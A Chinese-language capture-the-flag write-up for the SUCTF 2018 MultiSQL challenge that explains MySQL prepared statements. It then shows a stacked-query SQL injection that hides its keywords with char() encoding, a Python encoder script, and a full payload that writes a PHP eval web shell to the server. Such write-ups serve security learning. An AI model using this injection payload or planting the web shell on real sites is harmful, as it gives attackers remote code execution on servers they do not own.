[SUCTF2018]MultiSQL-MySQL预处理学习

[SUCTF 2018]MultiSQL-MySQL预处理学习
进入题目后,注册账户登录

1

编辑头像可以上传文件,但是上传了php文件还是会变成jpg格式

2

再看用户信息这里,id=2那里可以随意更改,存在越权,1就是admin

3

这里接下来要用到MySQL的预处理,参考文章
set

1
2
3
4
5
6
7
8
9
MariaDB [(none)]> set @a='select version()';
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> select @a;
+------------------+
| @a               |
+------------------+
| select version() |
+------------------+

set 的作用就是定义一个变量,变量的命名必须是@开头。

prepare和execute
prepare语句用于预定义一个语句,并可以指定预定义语句名称。execute则是执行预定义语句。

1
2
3
prepare prepare_name from “sql语句”

execute prepare_name

示例

1
2
3
4
5
6
7
8
9
10
11
MariaDB [(none)]> prepare t from @a;
Query OK, 0 rows affected (0.00 sec)
Statement prepared

MariaDB [(none)]> execute t;
+-------------------+
| version()         |
+-------------------+
| 10.1.29-MariaDB-6 |
+-------------------+
1 row in set (0.00 sec)

结合起来利用就是

1
2
3
4
5
6
7
8
9
10
11
12
13
14
MariaDB [(none)]> set @a='select version()';
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> prepare t from @a;
Query OK, 0 rows affected (0.00 sec)
Statement prepared

MariaDB [(none)]> execute t;
+-------------------+
| version()         |
+-------------------+
| 10.1.29-MariaDB-6 |
+-------------------+
1 row in set (0.00 sec)

这题fuzz测试后发现过滤了union,select ,&,|,过滤了select然后存在堆叠注入的可以使用预处理注入,尝试写入shell,因为过滤了select等字符,使用char()绕过,需要执行的语句

1
select ‘<?php eval($_POST[_]);?>’ into outfile ‘/var/www/html/favicon/shell.php’;

使用脚本编程十进制:

1
2
3
4
5
6
7
8
str="select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"
len_str=len(str)
for i in range(0,len_str):
	if i == 0:
		print('char(%s'%ord(str[i]),end="")
	else:
		print(',%s'%ord(str[i]),end="")
print(')')

结果为

1
char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59)

payload:

1
?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare query from @sql;execute query;

利用该payload写入shell

4

接下来访问shell所在的位置并发送命令

5

flag应该在WelL_Th1s_14_fl4g

参考文章 :[SUCTF 2018]MultiSQL-MySQL预处理学习_suctf2018 multi ssql-CSDN博客